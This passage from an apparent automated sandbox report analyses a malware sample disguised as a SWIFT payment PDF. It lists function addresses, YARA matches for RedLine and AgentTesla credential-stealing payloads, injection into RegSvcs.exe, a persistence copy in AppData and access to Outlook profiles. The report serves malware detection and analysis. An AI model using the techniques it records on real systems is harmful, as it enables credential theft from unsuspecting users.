              Source: C:\Users\user\Desktop\z20SWIFT_MT103_Payment_552016_pdf.exeCode function: 0_2_0047E1FA0_2_0047E1FA
              Source: C:\Users\user\Desktop\z20SWIFT_MT103_Payment_552016_pdf.exeCode function: 0_2_0041A46B0_2_0041A46B
              Source: C:\Users\user\Desktop\z20SWIFT_MT103_Payment_552016_pdf.exeCode function: 0_2_0041240C0_2_0041240C
              Source: C:\Users\user\Desktop\z20SWIFT_MT103_Payment_552016_pdf.exeCode function: 0_2_004045E00_2_004045E0
              Source: C:\Users\user\Desktop\z20SWIFT_MT103_Payment_552016_pdf.exeCode function: 0_2_004128180_2_00412818
              Source: C:\Users\user\Desktop\z20SWIFT_MT103_Payment_552016_pdf.exeCode function: 0_2_0047CBF00_2_0047CBF0
              Source: C:\Users\user\Desktop\z20SWIFT_MT103_Payment_552016_pdf.exeCode function: 0_2_0044EBBC0_2_0044EBBC
              Source: C:\Users\user\Desktop\z20SWIFT_MT103_Payment_552016_pdf.exeCode function: 0_2_00412C380_2_00412C38
              Source: C:\Users\user\Desktop\z20SWIFT_MT103_Payment_552016_pdf.exeCode function: 0_2_0044ED9A0_2_0044ED9A
              Source: C:\Users\user\Desktop\z20SWIFT_MT103_Payment_552016_pdf.exeCode function: 0_2_00424F700_2_00424F70
              Source: C:\Users\user\Desktop\z20SWIFT_MT103_Payment_552016_pdf.exeCode function: 0_2_0041AF0D0_2_0041AF0D
              Source: C:\Users\user\Desktop\z20SWIFT_MT103_Payment_552016_pdf.exeCode function: 0_2_004271610_2_00427161
              Source: C:\Users\user\Desktop\z20SWIFT_MT103_Payment_552016_pdf.exeCode function: 0_2_004212BE0_2_004212BE
              Source: C:\Users\user\Desktop\z20SWIFT_MT103_Payment_552016_pdf.exeCode function: 0_2_004433900_2_00443390
              Source: C:\Users\user\Desktop\z20SWIFT_MT103_Payment_552016_pdf.exeCode function: 0_2_004433910_2_00443391
              Source: C:\Users\user\Desktop\z20SWIFT_MT103_Payment_552016_pdf.exeCode function: 0_2_0041D7500_2_0041D750
              Source: C:\Users\user\Desktop\z20SWIFT_MT103_Payment_552016_pdf.exeCode function: 0_2_004037E00_2_004037E0
              Source: C:\Users\user\Desktop\z20SWIFT_MT103_Payment_552016_pdf.exeCode function: 0_2_004278590_2_00427859
              Source: C:\Users\user\Desktop\z20SWIFT_MT103_Payment_552016_pdf.exeCode function: 0_2_0040F8900_2_0040F890
              Source: C:\Users\user\Desktop\z20SWIFT_MT103_Payment_552016_pdf.exeCode function: 0_2_0042397B0_2_0042397B
              Source: C:\Users\user\Desktop\z20SWIFT_MT103_Payment_552016_pdf.exeCode function: 0_2_00411B630_2_00411B63
              Source: C:\Users\user\Desktop\z20SWIFT_MT103_Payment_552016_pdf.exeCode function: 0_2_00423EBF0_2_00423EBF
              Source: C:\Users\user\Desktop\z20SWIFT_MT103_Payment_552016_pdf.exeCode function: 0_2_03F24AD80_2_03F24AD8
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_00408C601_2_00408C60
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_0040DC111_2_0040DC11
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_00407C3F1_2_00407C3F
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_00418CCC1_2_00418CCC
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_00406CA01_2_00406CA0
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_004028B01_2_004028B0
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_0041A4BE1_2_0041A4BE
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_00408C601_2_00408C60
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_004182441_2_00418244
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_004016501_2_00401650
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_00402F201_2_00402F20
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_004193C41_2_004193C4
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_004187881_2_00418788
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_00402F891_2_00402F89
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_00402B901_2_00402B90
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_004073A01_2_004073A0
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_0279D1001_2_0279D100
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_0279D9D01_2_0279D9D0
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_0279CDB81_2_0279CDB8
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_02790FD01_2_02790FD0
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_027910301_2_02791030
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_064167601_2_06416760
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_064157B81_2_064157B8
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_0641AA901_2_0641AA90
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_064109D01_2_064109D0
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_0641DE381_2_0641DE38
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_06411AC81_2_06411AC8
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_064189701_2_06418970
              Source: C:\Users\user\Desktop\z20SWIFT_MT103_Payment_552016_pdf.exeCode function: String function: 00445975 appears 65 times
              Source: C:\Users\user\Desktop\z20SWIFT_MT103_Payment_552016_pdf.exeCode function: String function: 0041171A appears 37 times
              Source: C:\Users\user\Desktop\z20SWIFT_MT103_Payment_552016_pdf.exeCode function: String function: 0041718C appears 44 times
              Source: C:\Users\user\Desktop\z20SWIFT_MT103_Payment_552016_pdf.exeCode function: String function: 0040E6D0 appears 35 times
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: String function: 0040E1D8 appears 43 times
              Source: z20SWIFT_MT103_Payment_552016_pdf.exe, 00000000.00000003.1709481398.00000000048CD000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs z20SWIFT_MT103_Payment_552016_pdf.exe
              Source: z20SWIFT_MT103_Payment_552016_pdf.exe, 00000000.00000003.1707933121.0000000004723000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs z20SWIFT_MT103_Payment_552016_pdf.exe
              Source: z20SWIFT_MT103_Payment_552016_pdf.exe, 00000000.00000002.1717405576.0000000003C50000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilename472d0e4f-32a4-4ea2-b137-597340264f0d.exe4 vs z20SWIFT_MT103_Payment_552016_pdf.exe
              Source: z20SWIFT_MT103_Payment_552016_pdf.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
              Source: 1.2.RegSvcs.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
              Source: 1.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
              Source: 1.2.RegSvcs.exe.2be0000.5.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
              Source: 1.2.RegSvcs.exe.2be0000.5.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AgentTeslaV2 author = ditekSHen, description = AgenetTesla Type 2 Keylogger payload
              Source: 1.2.RegSvcs.exe.280fe06.1.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
              Source: 1.2.RegSvcs.exe.280fe06.1.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AgentTeslaV2 author = ditekSHen, description = AgenetTesla Type 2 Keylogger payload
              Source: 1.2.RegSvcs.exe.3cd5390.6.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
              Source: 1.2.RegSvcs.exe.3cd5390.6.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AgentTeslaV2 author = ditekSHen, description = AgenetTesla Type 2 Keylogger payload
              Source: 1.2.RegSvcs.exe.3cd5390.6.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
              Source: 1.2.RegSvcs.exe.3cd5390.6.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AgentTeslaV2 author = ditekSHen, description = AgenetTesla Type 2 Keylogger payload
              Source: 1.2.RegSvcs.exe.2a10ee8.4.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
              Source: 1.2.RegSvcs.exe.2a10ee8.4.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AgentTeslaV2 author = ditekSHen, description = AgenetTesla Type 2 Keylogger payload
              Source: 1.2.RegSvcs.exe.2810cee.2.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
              Source: 1.2.RegSvcs.exe.2810cee.2.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AgentTeslaV2 author = ditekSHen, description = AgenetTesla Type 2 Keylogger payload
              Source: 1.2.RegSvcs.exe.2a10000.3.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
              Source: 1.2.RegSvcs.exe.2a10000.3.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AgentTeslaV2 author = ditekSHen, description = AgenetTesla Type 2 Keylogger payload
              Source: 1.2.RegSvcs.exe.2a10000.3.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
              Source: 1.2.RegSvcs.exe.2a10000.3.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AgentTeslaV2 author = ditekSHen, description = AgenetTesla Type 2 Keylogger payload
              Source: 0.2.z20SWIFT_MT103_Payment_552016_pdf.exe.3c50000.1.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
              Source: 1.2.RegSvcs.exe.280fe06.1.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
              Source: 1.2.RegSvcs.exe.280fe06.1.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AgentTeslaV2 author = ditekSHen, description = AgenetTesla Type 2 Keylogger payload
              Source: 1.2.RegSvcs.exe.2810cee.2.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
              Source: 1.2.RegSvcs.exe.2810cee.2.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AgentTeslaV2 author = ditekSHen, description = AgenetTesla Type 2 Keylogger payload
              Source: 1.2.RegSvcs.exe.2a10ee8.4.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
              Source: 1.2.RegSvcs.exe.2a10ee8.4.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AgentTeslaV2 author = ditekSHen, description = AgenetTesla Type 2 Keylogger payload
              Source: 1.2.RegSvcs.exe.2be0000.5.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
              Source: 1.2.RegSvcs.exe.2be0000.5.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AgentTeslaV2 author = ditekSHen, description = AgenetTesla Type 2 Keylogger payload
              Source: 00000000.00000002.1717405576.0000000003C50000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
              Source: 00000001.00000002.4155397178.0000000002A10000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
              Source: 00000001.00000002.4155397178.0000000002A10000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_AgentTeslaV2 author = ditekSHen, description = AgenetTesla Type 2 Keylogger payload
              Source: 00000001.00000002.4153975338.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
              Source: 00000001.00000002.4155829355.0000000002BE0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
              Source: 00000001.00000002.4155829355.0000000002BE0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_AgentTeslaV2 author = ditekSHen, description = AgenetTesla Type 2 Keylogger payload
              Source: 1.2.RegSvcs.exe.2a10ee8.4.raw.unpack, WP6RZJql8gZrNhVA9v.csCryptographic APIs: 'CreateDecryptor'
              Source: 1.2.RegSvcs.exe.2a10ee8.4.raw.unpack, WP6RZJql8gZrNhVA9v.csCryptographic APIs: 'CreateDecryptor'
              Source: 1.2.RegSvcs.exe.2be0000.5.raw.unpack, WP6RZJql8gZrNhVA9v.csCryptographic APIs: 'CreateDecryptor'
              Source: 1.2.RegSvcs.exe.2be0000.5.raw.unpack, WP6RZJql8gZrNhVA9v.csCryptographic APIs: 'CreateDecryptor'
              Source: 1.2.RegSvcs.exe.2be0000.5.raw.unpack, 4JJG6X.csCryptographic APIs: 'TransformFinalBlock'
              Source: 1.2.RegSvcs.exe.2be0000.5.raw.unpack, 4JJG6X.csCryptographic APIs: 'TransformFinalBlock'
              Source: 1.2.RegSvcs.exe.2be0000.5.raw.unpack, 8C78isHTVco.csCryptographic APIs: 'TransformFinalBlock'
              Source: 1.2.RegSvcs.exe.2be0000.5.raw.unpack, 8C78isHTVco.csCryptographic APIs: 'TransformFinalBlock'
              Source: 1.2.RegSvcs.exe.2be0000.5.raw.unpack, 8C78isHTVco.csCryptographic APIs: 'TransformFinalBlock'
              Source: 1.2.RegSvcs.exe.2be0000.5.raw.unpack, 8C78isHTVco.csCryptographic APIs: 'TransformFinalBlock'
              Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@7/5@2/2
              Source: C:\Users\user\Desktop\z20SWIFT_MT103_Payment_552016_pdf.exeCode function: 0_2_0044AF5C GetLastError,FormatMessageW,0_2_0044AF5C
              Source: C:\Users\user\Desktop\z20SWIFT_MT103_Payment_552016_pdf.exeCode function: 0_2_00464422 OpenProcess,GetLastError,GetLastError,GetCurrentThread,OpenThreadToken,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,AdjustTokenPrivileges,GetLastError,OpenProcess,AdjustTokenPrivileges,CloseHandle,TerminateProcess,GetLastError,CloseHandle,0_2_00464422
              Source: C:\Users\user\Desktop\z20SWIFT_MT103_Payment_552016_pdf.exeCode function: 0_2_004364AA GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,SetSystemPowerState,0_2_004364AA
              Source: C:\Users\user\Desktop\z20SWIFT_MT103_Payment_552016_pdf.exeCode function: 0_2_0045D517 SetErrorMode,GetDiskFreeSpaceW,GetLastError,SetErrorMode,0_2_0045D517
              Source: C:\Users\user\Desktop\z20SWIFT_MT103_Payment_552016_pdf.exeCode function: 0_2_0043701F CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,__wsplitpath,_wcscat,__wcsicoll,CloseHandle,0_2_0043701F
              Source: C:\Users\user\Desktop\z20SWIFT_MT103_Payment_552016_pdf.exeCode function: 0_2_0047A999 OleInitialize,CLSIDFromProgID,CoCreateInstance,CoInitializeSecurity,_memset,_wcslen,_memset,CoCreateInstanceEx,CoSetProxyBlanket,0_2_0047A999
              Source: C:\Users\user\Desktop\z20SWIFT_MT103_Payment_552016_pdf.exeCode function: 0_2_0043614F __swprintf,__swprintf,__wcsicoll,FindResourceW,LoadResource,LockResource,FindResourceW,LoadResource,SizeofResource,LockResource,CreateIconFromResourceEx,0_2_0043614F
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile created: C:\Users\user\AppData\Roaming\sgxIbJump to behavior
              Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeMutant created: NULL
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2492:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4476:120:WilError_03
              Source: C:\Users\user\Desktop\z20SWIFT_MT103_Payment_552016_pdf.exeFile created: C:\Users\user\AppData\Local\Temp\epistemologyJump to behavior
              Source: z20SWIFT_MT103_Payment_552016_pdf.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
              Source: C:\Users\user\Desktop\z20SWIFT_MT103_Payment_552016_pdf.exeFile read: C:\Users\desktop.iniJump to behavior
              Source: C:\Users\user\Desktop\z20SWIFT_MT103_Payment_552016_pdf.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
              Source: z20SWIFT_MT103_Payment_552016_pdf.exeReversingLabs: Detection: 23%
              Source: z20SWIFT_MT103_Payment_552016_pdf.exeVirustotal: Detection: 27%
              Source: C:\Users\user\Desktop\z20SWIFT_MT103_Payment_552016_pdf.exeFile read: C:\Users\user\Desktop\z20SWIFT_MT103_Payment_552016_pdf.exeJump to behavior
              Source: unknownProcess created: C:\Users\user\Desktop\z20SWIFT_MT103_Payment_552016_pdf.exe "C:\Users\user\Desktop\z20SWIFT_MT103_Payment_552016_pdf.exe"
              Source: C:\Users\user\Desktop\z20SWIFT_MT103_Payment_552016_pdf.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Users\user\Desktop\z20SWIFT_MT103_Payment_552016_pdf.exe"
              Source: unknownProcess created: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe "C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe"
              Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: unknownProcess created: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe "C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe"
              Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Users\user\Desktop\z20SWIFT_MT103_Payment_552016_pdf.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Users\user\Desktop\z20SWIFT_MT103_Payment_552016_pdf.exe"Jump to behavior
              Source: C:\Users\user\Desktop\z20SWIFT_MT103_Payment_552016_pdf.exeSection loaded: apphelp.dllJump to behavior
              Source: C:\Users\user\Desktop\z20SWIFT_MT103_Payment_552016_pdf.exeSection loaded: wsock32.dllJump to behavior
              Source: C:\Users\user\Desktop\z20SWIFT_MT103_Payment_552016_pdf.exeSection loaded: version.dllJump to behavior
              Source: C:\Users\user\Desktop\z20SWIFT_MT103_Payment_552016_pdf.exeSection loaded: winmm.dllJump to behavior
              Source: C:\Users\user\Desktop\z20SWIFT_MT103_Payment_552016_pdf.exeSection loaded: mpr.dllJump to behavior
              Source: C:\Users\user\Desktop\z20SWIFT_MT103_Payment_552016_pdf.exeSection loaded: wininet.dllJump to behavior
              Source: C:\Users\user\Desktop\z20SWIFT_MT103_Payment_552016_pdf.exeSection loaded: userenv.dllJump to behavior
              Source: C:\Users\user\Desktop\z20SWIFT_MT103_Payment_552016_pdf.exeSection loaded: uxtheme.dllJump to behavior
              Source: C:\Users\user\Desktop\z20SWIFT_MT103_Payment_552016_pdf.exeSection loaded: windows.storage.dllJump to behavior
              Source: C:\Users\user\Desktop\z20SWIFT_MT103_Payment_552016_pdf.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Users\user\Desktop\z20SWIFT_MT103_Payment_552016_pdf.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Users\user\Desktop\z20SWIFT_MT103_Payment_552016_pdf.exeSection loaded: msdart.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeSection loaded: mscoree.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeSection loaded: version.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeSection loaded: mscoree.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeSection loaded: version.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
              Source: C:\Users\user\Desktop\z20SWIFT_MT103_Payment_552016_pdf.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\InProcServer32Jump to behavior
              Source: Window RecorderWindow detected: More than 3 window changes detected
              Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\11.0\Outlook\ProfilesJump to behavior
              Source: z20SWIFT_MT103_Payment_552016_pdf.exeStatic file information: File size 1286373 > 1048576
              Source: Binary string: _.pdb source: RegSvcs.exe, 00000001.00000002.4155397178.0000000002A10000.00000004.08000000.00040000.00000000.sdmp, RegSvcs.exe, 00000001.00000002.4155100124.00000000027CF000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 00000001.00000002.4160367677.0000000003C81000.00000004.00000800.00020000.00000000.sdmp
              Source: Binary string: RegSvcs.pdb, source: sgxIb.exe, 00000003.00000000.1865369289.0000000000512000.00000002.00000001.01000000.00000007.sdmp, sgxIb.exe.1.dr
              Source: Binary string: wntdll.pdbUGP source: z20SWIFT_MT103_Payment_552016_pdf.exe, 00000000.00000003.1708975577.0000000004600000.00000004.00001000.00020000.00000000.sdmp, z20SWIFT_MT103_Payment_552016_pdf.exe, 00000000.00000003.1709106388.00000000047A0000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: wntdll.pdb source: z20SWIFT_MT103_Payment_552016_pdf.exe, 00000000.00000003.1708975577.0000000004600000.00000004.00001000.00020000.00000000.sdmp, z20SWIFT_MT103_Payment_552016_pdf.exe, 00000000.00000003.1709106388.00000000047A0000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: RegSvcs.pdb source: sgxIb.exe, 00000003.00000000.1865369289.0000000000512000.00000002.00000001.01000000.00000007.sdmp, sgxIb.exe.1.dr

              Data Obfuscation

              barindex
              Source: 1.2.RegSvcs.exe.2a10ee8.4.raw.unpack, WP6RZJql8gZrNhVA9v.cs.Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[2]{typeof(IntPtr),typeof(Type)})
              Source: 1.2.RegSvcs.exe.2be0000.5.raw.unpack, WP6RZJql8gZrNhVA9v.cs.Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[2]{typeof(IntPtr),typeof(Type)})
              Source: 1.2.RegSvcs.exe.2810cee.2.raw.unpack, WP6RZJql8gZrNhVA9v.cs.Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[2]{typeof(IntPtr),typeof(Type)})
              Source: 1.2.RegSvcs.exe.3cd5390.6.raw.unpack, WP6RZJql8gZrNhVA9v.cs.Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[2]{typeof(IntPtr),typeof(Type)})
              Source: C:\Users\user\Desktop\z20SWIFT_MT103_Payment_552016_pdf.exeCode function: 0_2_0040EB70 LoadLibraryA,GetProcAddress,0_2_0040EB70
              Source: z20SWIFT_MT103_Payment_552016_pdf.exeStatic PE information: real checksum: 0xa2135 should be: 0x142fd8
              Source: C:\Users\user\Desktop\z20SWIFT_MT103_Payment_552016_pdf.exeCode function: 0_2_004171D1 push ecx; ret 0_2_004171E4
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_0041C40C push cs; iretd 1_2_0041C4E2
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_00423149 push eax; ret 1_2_00423179
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_0041C50E push cs; iretd 1_2_0041C4E2
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_004231C8 push eax; ret 1_2_00423179
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_0040E21D push ecx; ret 1_2_0040E230
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_0041C6BE push ebx; ret 1_2_0041C6BF
